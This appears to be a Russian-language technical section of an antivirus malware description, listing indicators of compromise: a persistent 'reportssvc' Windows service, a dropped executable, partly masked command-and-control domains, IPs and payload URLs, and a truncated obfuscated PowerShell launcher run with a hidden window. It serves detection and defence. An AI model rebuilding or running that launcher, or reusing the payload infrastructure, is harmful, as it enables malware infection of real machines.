Техническая информация
- [HKLM\System\CurrentControlSet\Services\reportssvc] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\reportssvc] 'ImagePath' = '"%WINDIR%\SysWOW64\reportssvc.exe"'
- 'reportssvc' "%WINDIR%\SysWOW64\reportssvc.exe"
- 'reportssvc' %WINDIR%\SysWOW64\reportssvc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((vArIaBLE '*MDR*').nAmE[3,11,2]-JOIn'') (([CHaR[]] (60, 105,80 , 126 , 37 ,118,125 , 111, 53,119 , 122, 114 ,125, 123, 108, 56,86 ,125 ,108, 54, 79,125, 122, 91 , 116 ,113 , 125,118 , 108 ,3...
- %WINDIR%\syswow64\reportssvc.exe
- %TEMP%\65.exe
- %TEMP%\65.exe в %WINDIR%\syswow64\reportssvc.exe
- 'cl####lvoitalia.it':80
- 'er####nsulting.com':80
- 'go###nfell.ru':80
- 'mo###erljud.se':80
- '92.##.116.104':80
- '24.##3.127.246':443
- '24.##1.176.48':443
- http://er####nsulting.com/7I3eUNF/
- http://www.go###nfell.ru/media/5DzF30jL/
- http://www.mo###erljud.se/VJkuLg/
- DNS ASK cl####lvoitalia.it
- DNS ASK er####nsulting.com
- DNS ASK go###nfell.ru
- DNS ASK jm###sical.jp
- DNS ASK mo###erljud.se
- '%TEMP%\65.exe'
- '%WINDIR%\syswow64\reportssvc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((vArIaBLE '*MDR*').nAmE[3,11,2]-JOIn'') (([CHaR[]] (60, 105,80 , 126 , 37 ,118,125 , 111, 53,119 , 122, 114 ,125, 123, 108, 56,86 ,125 ,108, 54, 79,125, 122, 91 , 116 ,113 , 125,118 , 108 ,3...' (со скрытым окном)